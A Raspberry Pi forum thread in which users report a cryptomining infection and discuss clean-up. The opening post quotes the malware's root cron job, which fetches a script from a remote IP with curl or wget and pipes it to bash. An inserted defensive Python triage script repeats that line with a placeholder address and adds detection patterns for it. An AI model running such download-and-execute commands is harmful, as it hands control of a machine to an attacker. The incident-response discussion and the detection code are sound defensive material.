Virus or not ?

Posted: Thu Jun 13, 2019 7:23 am
by Martial
Hi,
I use 2 RPis (one RPi 3B and one RPi 2B) with Raspbian and Domoticz.
On the RPi 3, I had this problem:
- messages
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
- in root crontab
* * * * * (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh

I have done a restore, changed the pi and root passwords, and closed the NAT rules on my box (public 8080 --> 80: Domoticz, 1194: OpenVPN).
And the problem seems to be fixed.

Do you know this attack?
What can I do before reopening the ports?
Thank you for your help.
Martial
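A small triage check for the two artefacts Martial lists above (an entry in /etc/ld.so.preload and a cron job that fetches a script and pipes it into a shell), added here as an illustration and not code from this thread; the sample file contents and the 203.0.113.10 address are constructed placeholders.

```python
import os
import re
from typing import Callable, Dict, List

# Constructed sample of /etc/ld.so.preload, naming the path from the ld.so error above.
SAMPLE_PRELOAD = "/usr/local/lib/libkk.so\n"
# Constructed sample root crontab: one benign job, one fetch-and-pipe-to-shell job
# shaped like the one in the post (203.0.113.10 is a placeholder address).
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/local/bin/backup.sh\n"
    "* * * * * (curl -s http://203.0.113.10/mr.sh||wget -q -O - http://203.0.113.10/mr.sh)|bash -sh\n"
)

FETCH = re.compile(r"\b(curl|wget)\b")          # something is downloaded...
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")   # ...and piped straight into a shell
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")  # bare-IP URL, no hostname

def preload_findings(text: str, exists: Callable[[str], bool] = os.path.exists) -> List[Dict[str, object]]:
    """Stock Raspbian ships no /etc/ld.so.preload, so every entry deserves a look.
    present=False means only the hook is left behind (the 'cannot be preloaded' error
    in the post); present=True means the library is still loaded into every process."""
    findings = []
    for line in text.splitlines():
        path = line.split("#", 1)[0].strip()   # tolerate a trailing '#' comment
        if path:
            findings.append({"path": path, "present": exists(path)})
    return findings

def cron_findings(text: str) -> List[str]:
    """Flag jobs that download and execute in one line, or that fetch from a bare IP."""
    flagged = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        download_and_run = FETCH.search(line) and PIPE_TO_SHELL.search(line)
        if download_and_run or IP_URL.search(line):
            flagged.append(line)
    return flagged

def triage(preload_text: str, crontab_text: str, exists=os.path.exists) -> Dict[str, object]:
    """One verdict over both persistence spots; on a live box feed it the real files:
    triage(open('/etc/ld.so.preload').read(), <output of 'crontab -l -u root'>)."""
    preload = preload_findings(preload_text, exists)
    cron = cron_findings(crontab_text)
    return {"preload": preload, "cron": cron, "suspicious": bool(preload or cron)}
```

Run it against the constructed samples with `exists=lambda p: False` to reproduce the "left-behind hook" case from the first post; a hit in either list is a reason to rebuild from a clean image rather than to keep deleting files.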

Re: Virus or not ?

Posted: Thu Jun 13, 2019 8:43 am
by jamesh

Re: Virus or not ?

Posted: Thu Jun 13, 2019 10:54 am
by rutgercjonaker
I have also got it. :shock:
Is it "mr.sh"?
I have tried removing some temp files but no luck.
Does anyone know how to remove it without going back to an old backup?

Re: Virus or not ?

Posted: Thu Jun 13, 2019 11:22 am
by jamesh
https://discourse.nodered.org/t/cryptom ... rvers/3454

Reformat the SD card and ensure you follow sensible security policies when opening a device to the internet.

Re: Virus or not ?

Posted: Fri Jun 14, 2019 8:53 am
by Martial
Thank you Jamesh,
Do you know the most likely door they used to enter?
The web server of Domoticz?
OpenVPN?
I had already changed the passwords of root and pi. Can I find a trace of their entry into my system in a system log?

Regards

Re: Virus or not ?

Posted: Fri Jun 14, 2019 9:12 am
by jamesh
Martial wrote:
Fri Jun 14, 2019 8:53 am
Thank you Jamesh,
Do you know the most likely door they used to enter?
The web server of Domoticz?
OpenVPN?
I had already changed the passwords of root and pi. Can I find a trace of their entry into my system in a system log?

Regards
I have no idea. Sorry.

Re: Virus or not ?

Posted: Mon Jun 17, 2019 7:34 pm
by SouD
Hi guys,
I got the same crypto malware / virus.

I deleted all cron entries and temporary folders, blocked all ports / IPs, but it still persists.
It stopped for a few days but came back (I'm tracking it with Wireshark).

I'm going to reinstall all the system one more time...
Martial, can you tell me if your system has been hacked again right after the reinstall?
Can I reconfigure the Pi for the XXXXXXXth time worry-free? Or should I pray for my IP not to be listed on a wrong list?

BTW I'm using the Raspberry for OctoPrint / OpenVPN / Domoticz only. I have internet access to Domoticz for a personal project :/
I suspect domoticz...

SouD

Re: Virus or not ?

Posted: Tue Jun 18, 2019 7:44 am
by Martial
SouD wrote:
Mon Jun 17, 2019 7:34 pm

Martial, can you tell me if your system has been hacked again right after the reinstall?
Can I reconfigure the Pi for the XXXXXXXth time worry-free? Or should I pray for my IP not to be listed on a wrong list?
SouD
Hi,
I have not reinstalled the system; I used a clone of my SD card which, luckily, was only a few hours old and without the virus.

I have not reopened the NAT rules; I am looking to secure all that first.
Martial